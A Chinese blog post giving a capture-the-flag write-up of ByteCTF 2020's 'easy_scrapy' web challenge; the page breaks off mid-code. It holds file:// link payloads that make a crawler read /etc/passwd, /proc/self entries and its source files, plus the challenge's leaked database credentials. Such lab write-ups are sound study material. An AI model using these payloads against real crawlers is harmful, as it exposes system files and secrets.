

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="cter, web security, red team">
  <meta name="author" content="slug01sh">
  <meta name="keywords" content="生活,安全,编程,英语">
  <title>2020年10月ByteCTF部分web题解 - slug01sh&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.4.0/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"onlypost":false},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.1.1"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Fluid</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="2020年10月ByteCTF部分web题解">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2020-10-25 09:22" pubdate>
        2020年10月25日 上午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      3.3k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      49
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">2020年10月ByteCTF部分web题解</h1>
            
            <div class="markdown-body">
              <p>题解和题目地址：<a target="_blank" rel="noopener" href="https://github.com/ctfwiki/ctf_game_history/blob/master/2020/ByteCTF.md">https://github.com/ctfwiki/ctf_game_history/blob/master/2020/ByteCTF.md</a><br>官方题解：<a target="_blank" rel="noopener" href="https://bytectf.feishu.cn/docs/doccnqzpGCWH1hkDf5ljGdjOJYg#xQHQ9D">https://bytectf.feishu.cn/docs/doccnqzpGCWH1hkDf5ljGdjOJYg#xQHQ9D</a></p>
<hr>
<a id="more"></a>


<p>用于爆破 md5 的脚本（验证码）：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># crack.py</span><br><br><span class="hljs-keyword">import</span> hashlib<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">md5</span>(<span class="hljs-params">s</span>):</span><br>    <span class="hljs-keyword">return</span> hashlib.md5(s.encode()).hexdigest()<br><span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br>    c = input()<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(<span class="hljs-number">1</span>, <span class="hljs-number">9999999999</span>):<br>        <span class="hljs-keyword">if</span> md5(str(i)).startswith(c):<br>            print(i)<br>            print(<span class="hljs-string">&#x27;----------------&#x27;</span>)<br>            <span class="hljs-keyword">break</span><br><br></code></pre></td></tr></table></figure>

<hr>
<h1 id="easy-scrapy"><a href="#easy-scrapy" class="headerlink" title="easy_scrapy"></a>easy_scrapy</h1><ul>
<li>题目地址：<a target="_blank" rel="noopener" href="http://101.200.50.18:30010/">http://101.200.50.18:30010/</a></li>
<li>官方题解：<a target="_blank" rel="noopener" href="https://bytectf.feishu.cn/docs/doccnqzpGCWH1hkDf5ljGdjOJYg#bFxJPC">https://bytectf.feishu.cn/docs/doccnqzpGCWH1hkDf5ljGdjOJYg#bFxJPC</a></li>
<li>oxcccccc：<a target="_blank" rel="noopener" href="http://blog.ccreater.top/2020/10/26/2020ByteCTF/">http://blog.ccreater.top/2020/10/26/2020ByteCTF/</a></li>
<li>N0rth3题解：<a target="_blank" rel="noopener" href="https://northity.com/2020/10/30/ByteCTF%E5%88%9D%E8%B5%9B%E5%87%BA%E9%A2%98%E7%AC%94%E8%AE%B0/">https://northity.com/2020/10/30/ByteCTF%E5%88%9D%E8%B5%9B%E5%87%BA%E9%A2%98%E7%AC%94%E8%AE%B0/</a></li>
<li>ByteCTF2020-easyscrapy：<a target="_blank" rel="noopener" href="https://www.jianshu.com/p/0823666a7687">https://www.jianshu.com/p/0823666a7687</a></li>
<li>ByteCTF2020—w4nder：<a target="_blank" rel="noopener" href="http://phoebe233.cn/?p=328#easyscrapy">http://phoebe233.cn/?p=328#easyscrapy</a></li>
</ul>
<p>经过测试，该网站会爬取提交的链接以及链接中的外链，并且提交链接的类型只能是 HTTPS。我当时只在提交链接的部分测试了SSRF，以后在做题时，需要边做边写题解，这样会让自己的思路更加的清晰和正确。</p>
<p>在 服务器编写 1.html ，然后提交 url 即可得到 /etc/passwd 文件，成功本地文件包含，返回结果如下。</p>
<figure class="highlight sml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs sml"><br>b&#x27;&lt;a href=<span class="hljs-string">&quot;file:///etc/passwd&quot;</span>&gt;\n&#x27;<br><br></code></pre></td></tr></table></figure>
<p><img src="https://blog-1256032382.cos.ap-nanjing.myqcloud.com/img/C64DAEFD-214C-40D8-8BFF-24326D290575.png" srcset="/img/loading.gif"></p>
<p>考虑去读取爬虫的源码，但是并不知道路径，尝试 proc 目录。GET 新姿势，在服务器源码中写入下面的代码并提交。</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><br>&lt;a <span class="hljs-attribute">href</span>=<span class="hljs-string">&quot;file:///proc/self/cmdline&quot;</span>&gt;<br><br></code></pre></td></tr></table></figure>
<p>proc/self/cmdline 中 /proc/self  是指向当前进程的内存，/proc/self/cmdline 启动进程时执行的命令。类似的接口还有：</p>
<ul>
<li>/proc/$PID/environ 该文件保存进程的环境变量</li>
<li>/proc/$PID/cwd 一个符号连接, 指向进程当前的工作目录</li>
<li>/proc/$PID/exe 一个符号连接, 指向被执行的二进制代码</li>
<li>/proc/$PID/fd 进程所打开的每个文件都有一个符号连接在该子目录里, 以文件描述符命名, 这个名字实际上是指向真正的文件的符号连接</li>
<li>/proc/$PID/attr 进程的属性<br>tip: 当找不到网站路径的时候，可以利用 /proc/self/cwd 目录来读取文件路径</li>
</ul>
<p>当提交请求后的返回结果为：</p>
<figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs gradle"><br>b<span class="hljs-string">&#x27;/usr/local/bin/python\x00/usr/local/bin/scrapy\x00crawl\x00byte\x00&#x27;</span><br># 解码后：<span class="hljs-regexp">/usr/</span>local<span class="hljs-regexp">/bin/</span>python <span class="hljs-regexp">/usr/</span>local<span class="hljs-regexp">/bin/</span>scrapy crawl <span class="hljs-keyword">byte</span><br><br></code></pre></td></tr></table></figure>
<p>b’ 是 Python 的 bytes 类型，表明这个变量在存储的时候是 bytes 类型（二进制形式）。上面的命令可以被化简为 python scrapy crawl byte，这是 scrapy 的启动命令。爬虫的名称叫做 byte，在 spiders 目录中有用。</p>
<h2 id="读取文件"><a href="#读取文件" class="headerlink" title="读取文件"></a>读取文件</h2><p>我们可以参考 <a target="_blank" rel="noopener" href="https://scrapy-chs.readthedocs.io/zh_CN/0.24/topics/commands.html#scrapy">scrapy 的文档</a>，我们可以知道 scrapy 的目录结构（贯穿全文）</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs stylus"><br>scrapy.cfg<br>myproject/（项目名称，未知）<br>    __init__.py<br>    items.py<br>    pipelines.py<br>    settings.py<br>    spiders/<br>        __init__.py<br>        spider1.py<br>        spider2.py<br>        ...<br><br></code></pre></td></tr></table></figure>

<p>目录结构 +  /proc/self/cwd 来进行文件读取。首先尝试读取 scrapy.cfg 文件（另外的数据需要使用项目名称）。构造 SSRF 的 url 如下：</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><br>&lt;a <span class="hljs-attribute">href</span>=<span class="hljs-string">&quot;file:///proc/self/cwd/scrapy.cfg&quot;</span>&gt;<br><br></code></pre></td></tr></table></figure>
<p>其中 /proc/self/cwd/ 指向工作路径（current work directory 简称 cwd），读取工作路径下的 scrapy.cfg 文件。再次提交 url，返回结果如下：</p>
<figure class="highlight latex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs latex"># scrapy.cfg<br><br>b&#x27;# Automatically created by: scrapy startproject<span class="hljs-tag">\<span class="hljs-name">n</span></span>#<span class="hljs-tag">\<span class="hljs-name">n</span></span># For more information about the [deploy] section see:<span class="hljs-tag">\<span class="hljs-name">n</span></span># https://scrapyd.readthedocs.io/en/latest/deploy.html<span class="hljs-tag">\<span class="hljs-name">n</span></span><span class="hljs-tag">\<span class="hljs-name">n</span><span class="hljs-string">[settings]</span></span><span class="hljs-tag">\<span class="hljs-name">ndefault</span> = </span>bytectf.settings<span class="hljs-tag">\<span class="hljs-name">n</span></span><span class="hljs-tag">\<span class="hljs-name">n</span><span class="hljs-string">[deploy]</span></span><span class="hljs-tag">\<span class="hljs-name">n</span></span>#url = http://localhost:6800/<span class="hljs-tag">\<span class="hljs-name">nproject</span> = </span>bytectf<span class="hljs-tag">\<span class="hljs-name">n</span></span>&#x27;<br><br></code></pre></td></tr></table></figure>
<p>这种格式的文本不便于进行阅读，Python 的 Bytes 直接输出就会呈现这种效果，使用 vscode 的替换功能将 \n 转换成“换行”。<br><img src="https://blog-1256032382.cos.ap-nanjing.myqcloud.com/img/472EE1BB-6765-4B4D-B9F0-341E25B7D163.png" srcset="/img/loading.gif"><br>修改为“正则模式”进行替换，将 “\n” 替换成 “\n”。通过上面的文本，我们就能够读取所有的文件了。</p>
<p>尝试读取 setting 文件。</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><br>&lt;a <span class="hljs-attribute">href</span>=<span class="hljs-string">&quot;file:///proc/self/cwd/bytectf/setting.py&quot;</span>&gt;（凭感觉在写代码。。）<br>&lt;a <span class="hljs-attribute">href</span>=<span class="hljs-string">&quot;file:///proc/self/cwd/bytectf/settings.py&quot;</span>&gt;<br><br></code></pre></td></tr></table></figure>
<p>？？？做着做着访问不了了（希望环境没事🙏。等待几分钟后环境恢复，估计是在重启。</p>
<p>参考上面的处理方法，将返回结果整理如下：（参考教程：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/fengf233/p/11400262.html%EF%BC%89">https://www.cnblogs.com/fengf233/p/11400262.html）</a></p>
<figure class="highlight vala"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><code class="hljs vala"><span class="hljs-meta"># setting.py</span><br><br>BOT_NAME = <span class="hljs-string">&#x27;bytectf&#x27;</span><br><span class="hljs-meta"># 此Scrapy项目名称</span><br><br>SPIDER_MODULES = [<span class="hljs-string">&#x27;bytectf.spiders&#x27;</span>]<br><span class="hljs-meta"># scrapy查找spider的路径</span><br><br>NEWSPIDER_MODULE = <span class="hljs-string">&#x27;bytectf.spiders&#x27;</span><br><span class="hljs-meta"># 指定使用genspider时创建spider的路径</span><br><br>RETRY_ENABLED = False<br><span class="hljs-meta"># </span><br>ROBOTSTXT_OBEY = False<br><span class="hljs-meta"># 表示遵不遵守君子协议，默认False</span><br><br>DOWNLOAD_TIMEOUT = <span class="hljs-number">8</span><br><span class="hljs-meta"># 超时时间</span><br><br>USER_AGENT = <span class="hljs-string">&#x27;scrapy_redis&#x27;</span><br><span class="hljs-meta"># 爬虫时使用的默认User-Agent</span><br><br>SCHEDULER = <span class="hljs-string">&quot;scrapy_redis.scheduler.Scheduler&quot;</span><br><span class="hljs-meta"># </span><br><br>DUPEFILTER_CLASS = <span class="hljs-string">&quot;scrapy_redis.dupefilter.RFPDupeFilter&quot;</span><br><span class="hljs-meta"># </span><br><br>REDIS_HOST = <span class="hljs-string">&#x27;172.20.0.7&#x27;</span><br><span class="hljs-meta"># redis 服务器地址</span><br><br>REDIS_PORT = <span class="hljs-number">6379</span><br><span class="hljs-meta"># redis 端口</span><br><br>ITEM_PIPELINES = &#123;<br><span class="hljs-string">&#x27;bytectf.pipelines.BytectfPipeline&#x27;</span>: <span class="hljs-number">300</span>,<br>&#125;<br><span class="hljs-meta"># 启用的item管道</span><br></code></pre></td></tr></table></figure>
<p>在其他人的题解中，他们尝试了攻击 redis，但是没有拿到 shell。我不会（暂时就不尝试了。在这个文件中没有 spider 的名称，考虑从  <strong>init</strong>.py 这个已知的文件入手。尝试读取  <strong>init</strong>.py 文件。</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><br>&lt;a <span class="hljs-attribute">href</span>=<span class="hljs-string">&quot;file:///proc/self/cwd/bytectf/spiders/__init__.py&quot;</span>&gt;<br><br></code></pre></td></tr></table></figure>
<p>没有数据</p>
<p>尝试读取 byte.py 文件（暂时还不清楚这个文件名「byte.py」的来源，猜测可能在 items.py、pipelines.py、bytectf/<strong>init</strong>.py 这些没有读取的文件中）。折腾了半天才在启动命令中发现爬虫的名称叫做 byte.py，当时没有理解这个命令的含义，血亏。</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><br>&lt;a <span class="hljs-attribute">href</span>=<span class="hljs-string">&quot;file:///proc/self/cwd/bytectf/spiders/byte.py&quot;</span>&gt;<br><br></code></pre></td></tr></table></figure>
<p>将回显结果进行整理。代码有点乱，Python 的缩进全无，只能依靠猜测源码大致的模样（\x 乱码使用 print(b””.decode(“utf-8”) 转换为中文)）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><code class="hljs python"><br><span class="hljs-comment"># byte.py</span><br><br><span class="hljs-keyword">import</span> scrapy<br><span class="hljs-keyword">import</span> re<br><span class="hljs-keyword">import</span> base64<br><span class="hljs-keyword">from</span> scrapy_redis.spiders <span class="hljs-keyword">import</span> RedisSpider<br><span class="hljs-keyword">from</span> bytectf.items <span class="hljs-keyword">import</span> BytectfItem<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">ByteSpider</span>(<span class="hljs-params">RedisSpider</span>):</span><br>    name = <span class="hljs-string">&#x27;byte&#x27;</span><br>    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">parse</span>(<span class="hljs-params">self, response</span>):</span><br>        byte_item = BytectfItem()<br>        <span class="hljs-comment"># 主键，原始 url</span><br>        byte_item[<span class="hljs-string">&#x27;byte_start&#x27;</span>] = response.request.url<br>        url_list = []<br>        test = response.xpath(<span class="hljs-string">&#x27;//a/@href&#x27;</span>).getall()<br>        <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> test:<br>            <span class="hljs-keyword">if</span> i[<span class="hljs-number">0</span>] == <span class="hljs-string">&#x27;/&#x27;</span>:<br>                url = response.request.url + i<br>            <span class="hljs-keyword">else</span>:<br>                url = i<br>            <span class="hljs-keyword">if</span> re.search(<span class="hljs-string">r&#x27;://&#x27;</span>, url):<br>                r = scrapy.Request(url, callback=self.parse2, dont_filter=<span class="hljs-literal">True</span>)<br>                r.meta[<span class="hljs-string">&#x27;item&#x27;</span>] = byte_item<br>                <span class="hljs-keyword">yield</span> r<br>            url_list.append(url)<br>            <span class="hljs-keyword">if</span>(len(url_list) &gt; <span class="hljs-number">3</span>):<br>                <span class="hljs-keyword">break</span><br>        byte_item[<span class="hljs-string">&#x27;byte_url&#x27;</span>] = response.request.url<br>        byte_item[<span class="hljs-string">&#x27;byte_text&#x27;</span>] = base64.b64encode((response.text).encode(<span class="hljs-string">&#x27;utf-8&#x27;</span>))<br>        <span class="hljs-keyword">yield</span> byte_item<br><br><br>    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">parse2</span>(<span class="hljs-params">self, response</span>):</span><br>        item = response.meta[<span class="hljs-string">&#x27;item&#x27;</span>]<br>        item[<span class="hljs-string">&#x27;byte_url&#x27;</span>] = response.request.url<br>        item[<span class="hljs-string">&#x27;byte_text&#x27;</span>] = base64.b64encode((response.text).encode(<span class="hljs-string">&#x27;utf-8&#x27;</span>))<br>        <span class="hljs-keyword">yield</span> item<br><br></code></pre></td></tr></table></figure>

<p>尝试读取前面猜测的文件，items.py、pipelines.py、bytectf/<strong>init</strong>.py</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><br>&lt;a <span class="hljs-attribute">href</span>=<span class="hljs-string">&quot;file:///proc/self/cwd/bytectf/items.py&quot;</span>&gt;<br>&lt;a <span class="hljs-attribute">href</span>=<span class="hljs-string">&quot;file:///proc/self/cwd/bytectf/pipelines.py&quot;</span>&gt;<br>&lt;a <span class="hljs-attribute">href</span>=<span class="hljs-string">&quot;file:///proc/self/cwd/bytectf/__init__.py&quot;</span>&gt;<br><br></code></pre></td></tr></table></figure>

<p>回显结果：</p>
<ol>
<li>items.py<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># items.py</span><br><br><span class="hljs-comment"># Define here the models for your scraped items</span><br><span class="hljs-comment">#</span><br><span class="hljs-comment"># See documentation in:</span><br><span class="hljs-comment"># https://docs.scrapy.org/en/latest/topics/items.html</span><br><span class="hljs-keyword">import</span> scrapy<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">BytectfItem</span>(<span class="hljs-params">scrapy.Item</span>):</span><br>    <span class="hljs-comment"># define the fields for your item here like:</span><br>    <span class="hljs-comment"># name = scrapy.Field()</span><br>    byte_start = scrapy.Field()  <span class="hljs-comment"># 起始页面</span><br>    byte_url = scrapy.Field()  <span class="hljs-comment"># 当前页面</span><br>    byte_text = scrapy.Field()  <span class="hljs-comment"># text</span><br><br></code></pre></td></tr></table></figure></li>
<li>pipelines.py（等等，N0rth3 怎么那么熟悉，出题人可还行，没注意）<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># pipelines.py</span><br><br><span class="hljs-keyword">import</span> pymongo<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">BytectfPipeline</span>:</span><br>    <span class="hljs-comment"># 连接数据库</span><br>    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__init__</span>(<span class="hljs-params">self</span>):</span><br>        <span class="hljs-comment"># 获取数据库连接信息</span><br>        MONGODB_HOST = <span class="hljs-string">&#x27;172.20.0.8&#x27;</span><br>        MONGODB_PORT = <span class="hljs-number">27017</span><br>        MONGODB_DBNAME = <span class="hljs-string">&#x27;result&#x27;</span><br>        MONGODB_TABLE = <span class="hljs-string">&#x27;result&#x27;</span><br>        MONGODB_USER = <span class="hljs-string">&#x27;N0rth3&#x27;</span><br>        MONGODB_PASSWD = <span class="hljs-string">&#x27;E7B70D0456DAD39E22735E0AC64A69AD&#x27;</span><br>        mongo_client = pymongo.MongoClient(<br>            <span class="hljs-string">&quot;%s:%d&quot;</span> % (MONGODB_HOST, MONGODB_PORT))<br>        mongo_client[MONGODB_DBNAME].authenticate(<br>            MONGODB_USER, MONGODB_PASSWD, MONGODB_DBNAME)<br>        mongo_db = mongo_client[MONGODB_DBNAME]<br>        self.table = mongo_db[MONGODB_TABLE]<br><span class="hljs-comment"># 处理item</span><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">process_item</span>(<span class="hljs-params">self, item, spider</span>):</span><br><span class="hljs-comment"># 使用dict转换item，然后插入数据库</span><br>    quote_info = dict(item)<br>    print(quote_info)<br>    self.table.insert(quote_info)<br>    <span class="hljs-keyword">return</span> item<br><br></code></pre></td></tr></table></figure></li>
<li>bytectf/<strong>init</strong>.py：空</li>
</ol>
<p>爬虫源码非常简单，全部文件读出来还会发现内网有一台 mongodb 其实为了防止大家跑偏这台 mongodb 特意加了密码，简单想一下就会发现并没有什么能利用的（原因：redis 机器的 ip 不是 localhost，所以拿到 shell 也没用），然后我们继续分析爬虫的源码（不是很能理解）。也就是其中的这段代码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs python"><br><span class="hljs-comment"># byte.py 片段</span><br><br>    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">parse</span>(<span class="hljs-params">self, response</span>):</span><br>        byte_item = BytectfItem()<br>        <span class="hljs-comment"># 主键，原始 url</span><br>        byte_item[<span class="hljs-string">&#x27;byte_start&#x27;</span>] = response.request.url<br>        url_list = []<br>        test = response.xpath(<span class="hljs-string">&#x27;//a/@href&#x27;</span>).getall()<br>        <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> test:<br>            <span class="hljs-keyword">if</span> i[<span class="hljs-number">0</span>] == <span class="hljs-string">&#x27;/&#x27;</span>:<br>                url = response.request.url + i<br>            <span class="hljs-keyword">else</span>:<br>                url = i<br>            <span class="hljs-keyword">if</span> re.search(<span class="hljs-string">r&#x27;://&#x27;</span>, url):<br>                r = scrapy.Request(url, callback=self.parse2, dont_filter=<span class="hljs-literal">True</span>)<br>                r.meta[<span class="hljs-string">&#x27;item&#x27;</span>] = byte_item<br>                <span class="hljs-keyword">yield</span> r<br>            url_list.append(url)<br>            <span class="hljs-keyword">if</span>(len(url_list) &gt; <span class="hljs-number">3</span>):<br>                <span class="hljs-keyword">break</span><br>        byte_item[<span class="hljs-string">&#x27;byte_url&#x27;</span>] = response.request.url<br>        byte_item[<span 